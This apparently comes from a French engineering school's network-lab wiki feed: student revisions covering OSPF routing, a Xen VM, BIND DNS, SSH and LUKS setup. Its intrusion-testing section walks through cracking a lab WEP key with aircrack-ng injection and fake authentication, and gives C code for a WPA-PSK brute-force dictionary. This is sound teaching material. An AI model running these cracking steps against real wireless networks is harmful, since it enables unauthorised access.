! !! Type !! Port&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Te5/4&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| AAA&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| 9200&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| Gi1/0/1&lt;br /&gt;
| 131&lt;br /&gt;
| 192.168.222.13/29&lt;br /&gt;
|-&lt;br /&gt;
| ECOLE&lt;br /&gt;
| Fibre 10G&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! !! Type !! Port !! VLAN !! IP&lt;br /&gt;
|-&lt;br /&gt;
| ISR 4331&lt;br /&gt;
| Cuivre&lt;br /&gt;
| Gi1/0/2&lt;br /&gt;
| XXX&lt;br /&gt;
| YYY.YYY.YYY.YYY&lt;br /&gt;
|-&lt;br /&gt;
| SDSL&lt;br /&gt;
| Cuivre&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
| N/A&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage de l'OSPF ===&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                   # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise   # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
  router-id 10.60.100.2                                   # on change simplement l'id du routeur par rapport au 6509-E&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
  summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
  redistribute connected subnets                       &lt;br /&gt;
  redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53729</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53729"/>
				<updated>2020-11-16T15:28:02Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53722</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53722"/>
				<updated>2020-11-16T15:13:15Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=53713</id>
		<title>TP sysres IMA5sc 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&amp;diff=53713"/>
				<updated>2020-11-16T14:50:46Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| GURY Evan &amp;amp; DUBOIS Vincent&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| BARGIBANT Quentin &amp;amp; LAGNEAU Alex&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| SIMONIN Richard &amp;amp; MERTZ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| BENAYED Samuel &amp;amp; EVRARD Théo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| RINGOT Loïc &amp;amp; SANCHEZ Pierre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| NDUWAMUNGU Jean De Dieu &amp;amp; MOINAT Théau&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| EKHLAS EID Nour &amp;amp; BISALLI Clara&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| SOULAIMANI Jawad &amp;amp; TEKIN Kadir&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| VIEUBLED Tanguy &amp;amp; VERNIER Paul&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]&lt;br /&gt;
| MALTI Hind &amp;amp; AHOUASSOU Loris&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]&lt;br /&gt;
| DARDENNE Sébastien &amp;amp; CALLERISA Corto&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]&lt;br /&gt;
| NORMAND Quentin &amp;amp; CLAUDEL Maxime&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]&lt;br /&gt;
| FAUCHOIS Lukas &amp;amp; ROUILLÉ Guillaume&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==A faire==&lt;br /&gt;
&lt;br /&gt;
Chaque binôme peut :&lt;br /&gt;
* '''Compléter les tableaux du plan d'adressage'''&lt;br /&gt;
* Ajouter ses routes sur les 2 routeurs &lt;br /&gt;
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV4 (adresse + vrrp)&lt;br /&gt;
* Paramétrer '''son propre vlan''' (voir plan d'adressage) en IPV6 (adresse)&lt;br /&gt;
&lt;br /&gt;
